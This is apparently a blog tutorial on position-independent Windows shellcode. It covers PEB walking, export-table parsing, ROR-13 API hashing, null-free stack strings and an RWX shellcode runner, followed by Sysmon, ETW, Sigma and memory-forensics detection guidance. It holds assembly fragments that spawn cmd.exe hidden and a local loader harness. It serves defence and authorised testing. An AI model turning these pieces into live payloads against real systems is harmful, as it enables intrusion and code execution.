Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

By Debraj Basak·Jun 20, 2026·13 min readExploit Development

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.


1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).


2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

  • It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
  • It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
  • It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).


3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

ArchitectureInstructionResult
x86MOV EAX, FS:[0x30]EAXTEB.ProcessEnvironmentBlock (PEB)
x64MOV RAX, GS:[0x60]RAXTEB.ProcessEnvironmentBlock (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

StructFieldx86 offsetx64 offset
_TEBProcessEnvironmentBlock+0x030+0x060
_PEBLdr+0x00C+0x018
_PEB_LDR_DATAInLoadOrderModuleList+0x00C+0x010
_PEB_LDR_DATAInMemoryOrderModuleList+0x014+0x020
_PEB_LDR_DATAInInitializationOrderModuleList+0x01C+0x030
_LDR_DATA_TABLE_ENTRYDllBase+0x018+0x030
_LDR_DATA_TABLE_ENTRYBaseDllName+0x02C+0x058

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field
Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.


5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].


Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime
The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.


7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.


8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; trailing NUL via zeroed qword
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' (little-endian, no embedded zero)
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" — first arg for WinExec

Eliminate accidental nulls in opcodes:

AvoidUse insteadReason
mov rax, 0 (48 C7 C0 00 00 00 00)xor rax, raxRemoves four NUL bytes
push 0 (6A 00)xor reg, reg; push reg6A 00 contains a NUL
Short jumps spanning NUL displacementsPad with nop or reorder codeAvoids NUL in the offset byte
mov al, 0x00xor al, alSame fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.


9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

  1. RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
  2. The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    lea   rcx, [rsp + 0x40]         ; pointer to "cmd.exe" (built earlier)
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.


10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE)memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.


11. Common Attacker Techniques

TechniqueDescription
PEB walkingResolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports
Export hash resolutionROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack stringsPush immediates to materialise "cmd.exe", "WinExec", etc., on the stack
Reflective loadingPIC stub maps a full DLL into memory and calls its DllMain (T1620)
Remote injectionVirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID
APC queuingQueueUserAPC to deliver shellcode into an alertable thread
Process hollowingSuspend a benign process, unmap its image, write PIC payload, resume
Module stompingOverwrite the .text of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event IDSignal
1Process creation (with command line) — anomalous parents (winword.execmd.exe)
7ImageLoad from user-writable paths into system processes
8CreateRemoteThread — primary remote-injection signal
10ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD
17/18Named pipe creation/connection (common C2 channel)
25ProcessTampering (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS
      - '0x1410'      # VM_READ|VM_WRITE|VM_OPERATION
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

MitigationEffect
ACG (ProcessDynamicCodePolicy)Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE)
DEP / NXHardware-enforced non-execute on data pages
CFGInvalidates indirect calls to non-registered targets
HVCIHypervisor-enforced kernel code integrity
ASR rulesBlock office/script children, untrusted USB execution, etc.
Restrict SeDebugPrivilegeLimits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations
Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

ToolDescriptionLink
WinDbgVerify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY)microsoft.com
NASMAssemble x86/x64 PIC payloads in Intel syntaxnasm.us
x64dbgDynamic analysis of shellcode in a loader harnessx64dbg.com
Ghidra / IDAStatic disassembly of extracted opcodesghidra-sre.org
Process HackerInspect process memory regions and protectionsprocesshacker.sf.io
pe-sieveHunts injected, hollowed, or stomped modulesgithub.com/hasherezade/pe-sieve
Volatility 3malfind, ldrmodules, vadinfo for memory-resident PICvolatilityfoundation.org
YARASignature ROR-13 loops, PEB-walk prologues, hash tablesvirustotal.github.io/yara
SilkETWSubscribe to THREATINT and Kernel-Process providersgithub.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Reflective Code LoadingT1620Volatility malfind / ldrmodules; THREATINT ETW
Process Injection (parent)T1055Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM
Process Injection: DLLT1055.001Sysmon EID 7 from unusual paths; pe-sieve
Process Injection: APCT1055.004Kernel-Process ETW thread events on alertable waits
Process Injection: HollowingT1055.012Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan
Obfuscated Files or InformationT1027YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting InterpreterT1059EID 4688 / Sysmon EID 1 with command-line auditing

Summary

  • Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
  • The PEB → LdrInMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
  • Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
  • Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
  • Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

Related Tutorials

References

Get new drops in your inbox

Windows internals, exploit dev, and red-team write-ups — no spam, unsubscribe anytime.